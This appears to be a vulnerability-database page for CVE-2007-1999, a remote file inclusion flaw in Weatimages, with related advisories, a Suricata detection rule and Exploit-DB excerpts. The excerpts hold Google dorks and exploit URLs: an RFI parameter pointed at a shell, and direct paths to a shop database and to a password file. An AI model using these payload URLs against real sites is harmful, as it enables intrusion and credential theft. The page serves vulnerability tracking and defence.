CVE-2007-1999
published 2007-04-12CVE-2007-1999: PHP remote file inclusion vulnerability in index.php in Weatimages 1.7.1 and earlier, when weatimages.ini is missing, allows remote attackers to execute…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.79%
84.6th percentile
PHP remote file inclusion vulnerability in index.php in Weatimages 1.7.1 and earlier, when weatimages.ini is missing, allows remote attackers to execute arbitrary PHP code via a URL in the ini[langpack] parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| g.rodola | pyftpdlib | >= 0 < 0.2.0 | 0.2.0 |
| nazarkin.name | weatimages | <= 1.7.1 | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wppq-5927-w9p8: PHP remote file inclusion vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2007-1999 [HIGH] GHSA-wppq-5927-w9p8: PHP remote file inclusion vulnerability in index
PHP remote file inclusion vulnerability in index.php in Weatimages 1.7.1 and earlier, when weatimages.ini is missing, allows remote attackers to execute arbitrary PHP code via a URL in the ini[langpack] parameter.
GHSA
Improper privilege management in pyftpdlib
ghsa·2022-05-01·CVSS 7.5
CVE-2007-6741 [HIGH] CWE-269 Improper privilege management in pyftpdlib
Improper privilege management in pyftpdlib
The ftp_PORT function in FTPServer.py in pyftpdlib before 0.2.0 does not prevent TCP connections to privileged ports if the destination IP address matches the source IP address of the connection from the FTP client, which might allow remote authenticated users to conduct FTP bounce attacks via crafted FTP data, as demonstrated by an FTP bounce attack against a NAT server, a related issue to CVE-1999-0017.
Suricata
GPL IMAP login buffer overflow attempt
suricata·2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
CactuShop 6.0 - Database Disclosure
exploitdb·2009-12-26
CVE-2007-3061 CactuShop 6.0 - Database Disclosure
CactuShop 6.0 - Database Disclosure
---
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
/_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
[�] ~ Note : Forever RevengeHack.Com
[�] CactuShop v6 Database Disclosure Vulnerability
[�] Script: [ CactuShop v6 ]
[�] Language: [ ASP ]
[�] Download: [ http://www.aspindir.com/Goster/3114]
[�] Founder: [ LionTurk - [email protected] }
[�] My Home: [ RevengeHack.com ]
[�]N0T3 : Yeni Ac�klar�m� Bekleyin
###########################################################################
===[ Exploit And Dork ]===
[�] http://[target].com/[path]/database/cactushop6.mdb
[�] CactuShop v6 ASP Shopping Cart �1999-2006 Cactusoft International FZ-LLC & Cactusoft Ltd. All rights reserved.
[�
Exploit-DB
Weatimages 1.7.1 - ini[langpack] Remote File Inclusion
exploitdb·2007-04-10
CVE-2007-1999 Weatimages 1.7.1 - ini[langpack] Remote File Inclusion
Weatimages 1.7.1 - ini[langpack] Remote File Inclusion
---
RFI Weatimages Hack
Script name : Weatimages
Script Download Adress:http://www.hotscripts.com/jump.php?listing_id=52592&jump_type=1
Demo site:http://www.nazarkin.name/projects/weatimages/demo/index.php?ini[langpack]=shelladress
Google Dork : inurl: index.php?ini[langpack]=
Author:Co-Sarper-Der
Contact:[email protected]
Note:Thanx to ForeveRIslam
side note:
4. Installation
Unpack file "index.php" from this archive and upload it to separate directory (e.g. "photos/") on your web server.
In order to enable caching capabilities, you need to create the new directory named "weatimages-cache" in directory
with "index.php" and to set access rights 777 (rwxrwxrwx) to "weatimages-cache".
If you plan to customize configuration, upl
Exploit-DB
WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure
exploitdb·2007-01-01
CVE-1999-0953 WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure
WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure
---
WWWBoard 2.0 Alpha 2 (passwd.txt) Password Disclosure Vulnerability
Affected Software: WWWBoard 2.0 Alpha
Download: http://www.scriptarchive.com/wwwboard.html
Bugfounder: bd0rk
Contact: bd0rk[at]hackermail.com
Greetz: str0ke, Döner, TheJT, x0r_32
[+]Exploit: http://[target]/[www_board_path]/passwd.txt
# milw0rm.com [2007-01-01]
Exploit-DB
Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords
exploitdb·1999-02-09
CVE-1999-0372 Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords
Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords
---
source: https://www.securityfocus.com/bid/228/info
During installation of BackOffice 4.0, a file called reboot.ini is created and stored in the \Program Files\Microsoft BackOffice directory. This file contains clear-text usernames and passwords for several services that may be created during installation. These services include: SQL Executive Logon, Exchange Services, and MTS Remote Administration (and potentially others). The File ACLs for this file are set to Everyone:Full Control.
Clear-text usernames and passwords are stored in the \Program Files\Microsoft BackOffice\Reboot.ini file.
No writeups or analysis indexed.
http://osvdb.org/34807http://secunia.com/advisories/24863http://www.vupen.com/english/advisories/2007/1335https://exchange.xforce.ibmcloud.com/vulnerabilities/33553https://www.exploit-db.com/exploits/3700http://osvdb.org/34807http://secunia.com/advisories/24863http://www.vupen.com/english/advisories/2007/1335https://exchange.xforce.ibmcloud.com/vulnerabilities/33553https://www.exploit-db.com/exploits/3700
2007-04-12
Published